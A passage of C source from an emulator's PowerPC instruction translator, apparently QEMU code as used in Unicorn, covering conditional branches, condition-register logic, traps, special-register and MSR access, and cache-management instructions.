ctx->exception = POWERPC_EXCP_BRANCH; if (type == BCOND_LR || type == BCOND_CTR || type == BCOND_TAR) { target = tcg_temp_local_new(tcg_ctx); if (type == BCOND_CTR) { tcg_gen_mov_tl(tcg_ctx, target, cpu_ctr); } else if (type == BCOND_TAR) { gen_load_spr(tcg_ctx, target, SPR_TAR); } else { tcg_gen_mov_tl(tcg_ctx, target, cpu_lr); } } else { target = NULL; } if (LK(ctx->opcode)) { gen_setlr(ctx, ctx->base.pc_next); } l1 = gen_new_label(tcg_ctx); if ((bo & 0x4) == 0) { /* Decrement and test CTR */ TCGv temp = tcg_temp_new(tcg_ctx); if (type == BCOND_CTR) { /* * All ISAs up to v3 describe this form of bcctr as invalid but * some processors, ie. 64-bit server processors compliant with * arch 2.x, do implement a "test and decrement" logic instead, * as described in their respective UMs. This logic involves CTR * to act as both the branch target and a counter, which makes * it basically useless and thus never used in real code. * * This form was hence chosen to trigger extra micro-architectural * side-effect on real HW needed for the Spectre v2 workaround. * It is up to guests that implement such workaround, ie. linux, to * use this form in a way it just triggers the side-effect without * doing anything else harmful. */ if (unlikely(!is_book3s_arch2x(ctx))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, target); return; } if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, temp, cpu_ctr); } else { tcg_gen_mov_tl(tcg_ctx, temp, cpu_ctr); } if (bo & 0x2) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, temp, 0, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, temp, 0, l1); } tcg_gen_subi_tl(tcg_ctx, cpu_ctr, cpu_ctr, 1); } else { tcg_gen_subi_tl(tcg_ctx, cpu_ctr, cpu_ctr, 1); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, temp, cpu_ctr); } else { tcg_gen_mov_tl(tcg_ctx, temp, cpu_ctr); } if (bo & 0x2) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, temp, 0, l1); } else { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, temp, 0, l1); } } tcg_temp_free(tcg_ctx, temp); } if ((bo & 0x10) == 0) { /* Test CR */ uint32_t bi = BI(ctx->opcode); uint32_t mask = 0x08 >> (bi & 0x03); TCGv_i32 temp = tcg_temp_new_i32(tcg_ctx); if (bo & 0x8) { tcg_gen_andi_i32(tcg_ctx, temp, cpu_crf[bi >> 2], mask); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_EQ, temp, 0, l1); } else { tcg_gen_andi_i32(tcg_ctx, temp, cpu_crf[bi >> 2], mask); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, temp, 0, l1); } tcg_temp_free_i32(tcg_ctx, temp); } gen_update_cfar(ctx, ctx->base.pc_next - 4); if (type == BCOND_IM) { target_ulong li = (target_long)((int16_t)(BD(ctx->opcode))); if (likely(AA(ctx->opcode) == 0)) { gen_goto_tb(ctx, 0, ctx->base.pc_next + li - 4); } else { gen_goto_tb(ctx, 0, li); } } else { if (NARROW_MODE(ctx)) { tcg_gen_andi_tl(tcg_ctx, cpu_nip, target, (uint32_t)~3); } else { tcg_gen_andi_tl(tcg_ctx, cpu_nip, target, ~3); } gen_lookup_and_goto_ptr(ctx); tcg_temp_free(tcg_ctx, target); } if ((bo & 0x14) != 0x14) { /* fallthrough case */ gen_set_label(tcg_ctx, l1); gen_goto_tb(ctx, 1, ctx->base.pc_next); } } static void gen_bc(DisasContext *ctx) { gen_bcond(ctx, BCOND_IM); } static void gen_bcctr(DisasContext *ctx) { gen_bcond(ctx, BCOND_CTR); } static void gen_bclr(DisasContext *ctx) { gen_bcond(ctx, BCOND_LR); } static void gen_bctar(DisasContext *ctx) { gen_bcond(ctx, BCOND_TAR); } /*** Condition register logical ***/ #define GEN_CRLOGIC(name, tcg_op, opc) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ uint8_t bitmask; \ int sh; \ TCGv_i32 t0, t1; \ sh = (crbD(ctx->opcode) & 0x03) - (crbA(ctx->opcode) & 0x03); \ t0 = tcg_temp_new_i32(tcg_ctx); \ if (sh > 0) \ tcg_gen_shri_i32(tcg_ctx, t0, cpu_crf[crbA(ctx->opcode) >> 2], sh); \ else if (sh < 0) \ tcg_gen_shli_i32(tcg_ctx, t0, cpu_crf[crbA(ctx->opcode) >> 2], -sh); \ else \ tcg_gen_mov_i32(tcg_ctx, t0, cpu_crf[crbA(ctx->opcode) >> 2]); \ t1 = tcg_temp_new_i32(tcg_ctx); \ sh = (crbD(ctx->opcode) & 0x03) - (crbB(ctx->opcode) & 0x03); \ if (sh > 0) \ tcg_gen_shri_i32(tcg_ctx, t1, cpu_crf[crbB(ctx->opcode) >> 2], sh); \ else if (sh < 0) \ tcg_gen_shli_i32(tcg_ctx, t1, cpu_crf[crbB(ctx->opcode) >> 2], -sh); \ else \ tcg_gen_mov_i32(tcg_ctx, t1, cpu_crf[crbB(ctx->opcode) >> 2]); \ tcg_op(tcg_ctx, t0, t0, t1); \ bitmask = 0x08 >> (crbD(ctx->opcode) & 0x03); \ tcg_gen_andi_i32(tcg_ctx, t0, t0, bitmask); \ tcg_gen_andi_i32(tcg_ctx, t1, cpu_crf[crbD(ctx->opcode) >> 2], ~bitmask); \ tcg_gen_or_i32(tcg_ctx, cpu_crf[crbD(ctx->opcode) >> 2], t0, t1); \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i32(tcg_ctx, t1); \ } /* crand */ GEN_CRLOGIC(crand, tcg_gen_and_i32, 0x08); /* crandc */ GEN_CRLOGIC(crandc, tcg_gen_andc_i32, 0x04); /* creqv */ GEN_CRLOGIC(creqv, tcg_gen_eqv_i32, 0x09); /* crnand */ GEN_CRLOGIC(crnand, tcg_gen_nand_i32, 0x07); /* crnor */ GEN_CRLOGIC(crnor, tcg_gen_nor_i32, 0x01); /* cror */ GEN_CRLOGIC(cror, tcg_gen_or_i32, 0x0E); /* crorc */ GEN_CRLOGIC(crorc, tcg_gen_orc_i32, 0x0D); /* crxor */ GEN_CRLOGIC(crxor, tcg_gen_xor_i32, 0x06); /* mcrf */ static void gen_mcrf(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_i32(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_crf[crfS(ctx->opcode)]); } /*** System linkage ***/ /* rfi (supervisor only) */ static void gen_rfi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* * This instruction doesn't exist anymore on 64-bit server * processors compliant with arch 2.x */ if (is_book3s_arch2x(ctx)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } /* Restore CPU state */ CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_update_cfar(ctx, ctx->base.pc_next - 4); gen_helper_rfi(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } #if defined(TARGET_PPC64) static void gen_rfid(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Restore CPU state */ CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_update_cfar(ctx, ctx->base.pc_next - 4); gen_helper_rfid(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } static void gen_hrfid(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Restore CPU state */ CHK_HV; gen_helper_hrfid(tcg_ctx, tcg_ctx->cpu_env); gen_sync_exception(ctx); } #endif /* sc */ #define POWERPC_SYSCALL POWERPC_EXCP_SYSCALL static void gen_sc(DisasContext *ctx) { uint32_t lev; lev = (ctx->opcode >> 5) & 0x7F; gen_exception_err(ctx, POWERPC_SYSCALL, lev); } /*** Trap ***/ /* Check for unconditional traps (always or never) */ static bool check_unconditional_trap(DisasContext *ctx) { /* Trap never */ if (TO(ctx->opcode) == 0) { return true; } /* Trap always */ if (TO(ctx->opcode) == 31) { gen_exception_err(ctx, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_TRAP); return true; } return false; } /* tw */ static void gen_tw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_tw(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } /* twi */ static void gen_twi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); t1 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_tw(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } #if defined(TARGET_PPC64) /* td */ static void gen_td(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_td(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } /* tdi */ static void gen_tdi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; TCGv_i32 t1; if (check_unconditional_trap(ctx)) { return; } t0 = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); t1 = tcg_const_i32(tcg_ctx, TO(ctx->opcode)); gen_helper_td(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } #endif /*** Processor control ***/ static void gen_read_xer(DisasContext *ctx, TCGv dst) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_mov_tl(tcg_ctx, dst, cpu_xer); tcg_gen_shli_tl(tcg_ctx, t0, cpu_so, XER_SO); tcg_gen_shli_tl(tcg_ctx, t1, cpu_ov, XER_OV); tcg_gen_shli_tl(tcg_ctx, t2, cpu_ca, XER_CA); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_or_tl(tcg_ctx, dst, dst, t2); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); if (is_isa300(ctx)) { tcg_gen_shli_tl(tcg_ctx, t0, cpu_ov32, XER_OV32); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_gen_shli_tl(tcg_ctx, t0, cpu_ca32, XER_CA32); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_write_xer(TCGContext *tcg_ctx, TCGv src) { /* Write all flags, while reading back check for isa300 */ tcg_gen_andi_tl(tcg_ctx, cpu_xer, src, ~((1u << XER_SO) | (1u << XER_OV) | (1u << XER_OV32) | (1u << XER_CA) | (1u << XER_CA32))); tcg_gen_extract_tl(tcg_ctx, cpu_ov32, src, XER_OV32, 1); tcg_gen_extract_tl(tcg_ctx, cpu_ca32, src, XER_CA32, 1); tcg_gen_extract_tl(tcg_ctx, cpu_so, src, XER_SO, 1); tcg_gen_extract_tl(tcg_ctx, cpu_ov, src, XER_OV, 1); tcg_gen_extract_tl(tcg_ctx, cpu_ca, src, XER_CA, 1); } /* mcrxr */ static void gen_mcrxr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 dst = cpu_crf[crfD(ctx->opcode)]; tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_so); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_ov); tcg_gen_trunc_tl_i32(tcg_ctx, dst, cpu_ca); tcg_gen_shli_i32(tcg_ctx, t0, t0, 3); tcg_gen_shli_i32(tcg_ctx, t1, t1, 2); tcg_gen_shli_i32(tcg_ctx, dst, dst, 1); tcg_gen_or_i32(tcg_ctx, dst, dst, t0); tcg_gen_or_i32(tcg_ctx, dst, dst, t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 0); tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); } #ifdef TARGET_PPC64 /* mcrxrx */ static void gen_mcrxrx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv_i32 dst = cpu_crf[crfD(ctx->opcode)]; /* copy OV and OV32 */ tcg_gen_shli_tl(tcg_ctx, t0, cpu_ov, 1); tcg_gen_or_tl(tcg_ctx, t0, t0, cpu_ov32); tcg_gen_shli_tl(tcg_ctx, t0, t0, 2); /* copy CA and CA32 */ tcg_gen_shli_tl(tcg_ctx, t1, cpu_ca, 1); tcg_gen_or_tl(tcg_ctx, t1, t1, cpu_ca32); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); tcg_gen_trunc_tl_i32(tcg_ctx, dst, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #endif /* mfcr mfocrf */ static void gen_mfcr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t crm, crn; if (likely(ctx->opcode & 0x00100000)) { crm = CRM(ctx->opcode); if (likely(crm && ((crm & (crm - 1)) == 0))) { crn = ctz32(crm); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_crf[7 - crn]); tcg_gen_shli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rD(ctx->opcode)], crn * 4); } } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_mov_i32(tcg_ctx, t0, cpu_crf[0]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[1]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[2]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[3]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[4]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[5]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[6]); tcg_gen_shli_i32(tcg_ctx, t0, t0, 4); tcg_gen_or_i32(tcg_ctx, t0, t0, cpu_crf[7]); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); } } /* mfmsr */ static void gen_mfmsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_msr); } static void spr_noaccess(DisasContext *ctx, int gprn, int sprn) { } #define SPR_NOACCESS (&spr_noaccess) /* mfspr */ static inline void gen_op_mfspr(DisasContext *ctx) { void (*read_cb)(DisasContext *ctx, int gprn, int sprn); uint32_t sprn = SPR(ctx->opcode); if (ctx->pr) { read_cb = ctx->spr_cb[sprn].uea_read; } else if (ctx->hv) { read_cb = ctx->spr_cb[sprn].hea_read; } else { read_cb = ctx->spr_cb[sprn].oea_read; } if (likely(read_cb != NULL)) { if (likely(read_cb != SPR_NOACCESS)) { (*read_cb)(ctx, rD(ctx->opcode), sprn); } else { /* Privilege exception */ /* * This is a hack to avoid warnings when running Linux: * this OS breaks the PowerPC virtualisation model, * allowing userland application to read the PVR */ if (sprn != SPR_PVR) { qemu_log_mask(LOG_GUEST_ERROR, "Trying to read privileged spr " "%d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); } gen_priv_exception(ctx, POWERPC_EXCP_PRIV_REG); } } else { /* ISA 2.07 defines these as no-ops */ if ((ctx->insns_flags2 & PPC2_ISA207S) && (sprn >= 808 && sprn <= 811)) { /* This is a nop */ return; } /* Not defined */ qemu_log_mask(LOG_GUEST_ERROR, "Trying to read invalid spr %d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); /* * The behaviour depends on MSR:PR and SPR# bit 0x10, it can * generate a priv, a hv emu or a no-op */ if (sprn & 0x10) { if (ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } else { if (ctx->pr || sprn == 0 || sprn == 4 || sprn == 5 || sprn == 6) { gen_hvpriv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } } } static void gen_mfspr(DisasContext *ctx) { gen_op_mfspr(ctx); } /* mftb */ static void gen_mftb(DisasContext *ctx) { gen_op_mfspr(ctx); } /* mtcrf mtocrf*/ static void gen_mtcrf(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t crm, crn; crm = CRM(ctx->opcode); if (likely((ctx->opcode & 0x00100000))) { if (crm && ((crm & (crm - 1)) == 0)) { TCGv_i32 temp = tcg_temp_new_i32(tcg_ctx); crn = ctz32(crm); tcg_gen_trunc_tl_i32(tcg_ctx, temp, cpu_gpr[rS(ctx->opcode)]); tcg_gen_shri_i32(tcg_ctx, temp, temp, crn * 4); tcg_gen_andi_i32(tcg_ctx, cpu_crf[7 - crn], temp, 0xf); tcg_temp_free_i32(tcg_ctx, temp); } } else { TCGv_i32 temp = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, temp, cpu_gpr[rS(ctx->opcode)]); for (crn = 0 ; crn < 8 ; crn++) { if (crm & (1 << crn)) { tcg_gen_shri_i32(tcg_ctx, cpu_crf[7 - crn], temp, crn * 4); tcg_gen_andi_i32(tcg_ctx, cpu_crf[7 - crn], cpu_crf[7 - crn], 0xf); } } tcg_temp_free_i32(tcg_ctx, temp); } } /* mtmsr */ #if defined(TARGET_PPC64) static void gen_mtmsrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } if (ctx->opcode & 0x00010000) { /* L=1 form only updates EE and RI */ TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], (1 << MSR_RI) | (1 << MSR_EE)); tcg_gen_andi_tl(tcg_ctx, t1, cpu_msr, ~(target_ulong)((1 << MSR_RI) | (1 << MSR_EE))); tcg_gen_or_tl(tcg_ctx, t1, t1, t0); gen_helper_store_msr(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } else { /* * XXX: we need to update nip before the store if we enter * power saving mode, we will exit the loop directly from * ppc_store_msr */ gen_update_nip(ctx, ctx->base.pc_next); gen_helper_store_msr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)]); } /* Must stop the translation as machine state (may have) changed */ gen_stop_exception(ctx); } #endif /* defined(TARGET_PPC64) */ static void gen_mtmsr(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CHK_SV; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } if (ctx->opcode & 0x00010000) { /* L=1 form only updates EE and RI */ TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], (1 << MSR_RI) | (1 << MSR_EE)); tcg_gen_andi_tl(tcg_ctx, t1, cpu_msr, ~(target_ulong)((1 << MSR_RI) | (1 << MSR_EE))); tcg_gen_or_tl(tcg_ctx, t1, t1, t0); gen_helper_store_msr(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } else { TCGv msr = tcg_temp_new(tcg_ctx); /* * XXX: we need to update nip before the store if we enter * power saving mode, we will exit the loop directly from * ppc_store_msr */ gen_update_nip(ctx, ctx->base.pc_next); #if defined(TARGET_PPC64) tcg_gen_deposit_tl(tcg_ctx, msr, cpu_msr, cpu_gpr[rS(ctx->opcode)], 0, 32); #else tcg_gen_mov_tl(tcg_ctx, msr, cpu_gpr[rS(ctx->opcode)]); #endif gen_helper_store_msr(tcg_ctx, tcg_ctx->cpu_env, msr); tcg_temp_free(tcg_ctx, msr); } /* Must stop the translation as machine state (may have) changed */ gen_stop_exception(ctx); } /* mtspr */ static void gen_mtspr(DisasContext *ctx) { void (*write_cb)(DisasContext *ctx, int sprn, int gprn); uint32_t sprn = SPR(ctx->opcode); if (ctx->pr) { write_cb = ctx->spr_cb[sprn].uea_write; } else if (ctx->hv) { write_cb = ctx->spr_cb[sprn].hea_write; } else { write_cb = ctx->spr_cb[sprn].oea_write; } if (likely(write_cb != NULL)) { if (likely(write_cb != SPR_NOACCESS)) { (*write_cb)(ctx, sprn, rS(ctx->opcode)); } else { /* Privilege exception */ qemu_log_mask(LOG_GUEST_ERROR, "Trying to write privileged spr " "%d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); gen_priv_exception(ctx, POWERPC_EXCP_PRIV_REG); } } else { /* ISA 2.07 defines these as no-ops */ if ((ctx->insns_flags2 & PPC2_ISA207S) && (sprn >= 808 && sprn <= 811)) { /* This is a nop */ return; } /* Not defined */ qemu_log_mask(LOG_GUEST_ERROR, "Trying to write invalid spr %d (0x%03x) at " TARGET_FMT_lx "\n", sprn, sprn, ctx->base.pc_next - 4); /* * The behaviour depends on MSR:PR and SPR# bit 0x10, it can * generate a priv, a hv emu or a no-op */ if (sprn & 0x10) { if (ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } else { if (ctx->pr || sprn == 0) { gen_hvpriv_exception(ctx, POWERPC_EXCP_INVAL_SPR); } } } } #if defined(TARGET_PPC64) /* setb */ static void gen_setb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t8 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tm1 = tcg_temp_new_i32(tcg_ctx); int crf = crfS(ctx->opcode); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_GEU, t0, cpu_crf[crf], 4); tcg_gen_movi_i32(tcg_ctx, t8, 8); tcg_gen_movi_i32(tcg_ctx, tm1, -1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GEU, t0, cpu_crf[crf], t8, tm1, t0); tcg_gen_ext_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t8); tcg_temp_free_i32(tcg_ctx, tm1); } #endif /*** Cache management ***/ /* dcbf */ static void gen_dcbf(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* XXX: specification says this is treated as a load by the MMU */ TCGv t0; gen_set_access_type(ctx, ACCESS_CACHE); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_qemu_ld8u(ctx, t0, t0); tcg_temp_free(tcg_ctx, t0); } /* dcbfep (external PID dcbf) */ static void gen_dcbfep(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* XXX: specification says this is treated as a load by the MMU */ TCGv t0; CHK_SV; gen_set_access_type(ctx, ACCESS_CACHE); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, PPC_TLB_EPID_LOAD, DEF_MEMOP(MO_UB)); tcg_temp_free(tcg_ctx, t0); } /* dcbi (Supervisor only) */ static void gen_dcbi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA, val; CHK_SV; EA = tcg_temp_new(tcg_ctx); gen_set_access_type(ctx, ACCESS_CACHE); gen_addr_reg_index(ctx, EA); val = tcg_temp_new(tcg_ctx); /* XXX: specification says this should be treated as a store by the MMU */ gen_qemu_ld8u(ctx, val, EA); gen_qemu_st8(ctx, val, EA); tcg_temp_free(tcg_ctx, val); tcg_temp_free(tcg_ctx, EA); } /* dcdst */ static void gen_dcbst(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* XXX: specification say this is treated as a load by the MMU */ TCGv t0; gen_set_access_type(ctx, ACCESS_CACHE); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_qemu_ld8u(ctx, t0, t0); tcg_temp_free(tcg_ctx, t0); } /* dcbstep (dcbstep External PID version) */ static void gen_dcbstep(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* XXX: specification say this is treated as a load by the MMU */ TCGv t0; gen_set_access_type(ctx, ACCESS_CACHE); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, PPC_TLB_EPID_LOAD, DEF_MEMOP(MO_UB)); tcg_temp_free(tcg_ctx, t0); } /* dcbt */ static void gen_dcbt(DisasContext *ctx) { /* * interpreted as no-op * XXX: specification say this is treated as a load by the MMU but * does not generate any exception */ } /* dcbtep */ static void gen_dcbtep(DisasContext *ctx) { /* * interpreted as no-op * XXX: specification say this is treated as a load by the MMU but * does not generate any exception */ } /* dcbtst */ static void gen_dcbtst(DisasContext *ctx) { /* * interpreted as no-op * XXX: specification say this is treated as a load by the MMU but * does not generate any exception */ } /* dcbtstep */ static void gen_dcbtstep(DisasContext *ctx) { /* * interpreted as no-op * XXX: specification say this is treated as a load by the MMU but * does not generate any exception */ } /* dcbtls */ static void gen_dcbtls(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; /* Always fails locking the cache */ TCGv t0 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, t0, SPR_Exxx_L1CSR0); tcg_gen_ori_tl(tcg_ctx, t0, t0, L1CSR0_CUL); gen_store_spr(tcg_ctx, SPR_Exxx_L1CSR0, t0); tcg_temp_free(tcg_ctx, t0); } /* dcbz */ static void gen_dcbz(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv tcgv_addr; TCGv_i32 tcgv_op; gen_set_access_type(ctx, ACCESS_CACHE); tcgv_addr = tcg_temp_new(tcg_ctx); tcgv_op = tcg_const_i32(tcg_ctx, ctx->opcode & 0x03FF000); gen_addr_reg_index(ctx, tcgv_addr); gen_helper_dcbz(tcg_ctx, tcg_ctx->cpu_env, tcgv_addr, tcgv_op); tcg_temp_free(tcg_ctx, tcgv_addr); tcg_temp_free_i32(tcg_ctx, tcgv_op); } /* dcbzep */ static void gen_dcbzep(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv tcgv_addr; TCGv_i32 tcgv_op; gen_set_access_type(ctx, ACCESS_CACHE); tcgv_addr = tcg_temp_new(tcg_ctx); tcgv_op = tcg_const_i32(tcg_ctx, ctx->opcode & 0x03FF000); gen_addr_reg_index(ctx, tcgv_addr); gen_helper_dcbzep(tcg_ctx, tcg_ctx->cpu_env, tcgv_addr, tcgv_op); tcg_temp_free(tcg_ctx, tcgv_addr); tcg_temp_free_i32(tcg_ctx, tcgv_op); } /* dst / dstt */ static void gen_dst(DisasContext *ctx) { if (rA(ctx->opcode) == 0) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } else { /* interpreted as no-op */ } } /* dstst /dststt */ static void gen_dstst(DisasContext *ctx) { if (rA(ctx->opcode) == 0) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } else { /* interpreted as no-op */ } } /* dss / dssall */ static void gen_dss(DisasContext *ctx) { /* interpreted as no-op */ } /* icbi */ static void gen_icbi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; gen_set_access_type(ctx, ACCESS_CACHE); t0 = tcg_temp_new(tcg_ctx); gen_addr_reg_index(ctx, t0); gen_helper_icbi(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); } /* icbiep */ static void gen_icbiep(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; gen_set_access_type(ctx, ACCESS_CACHE); t0 = tcg_temp_new(tcg_ctx); 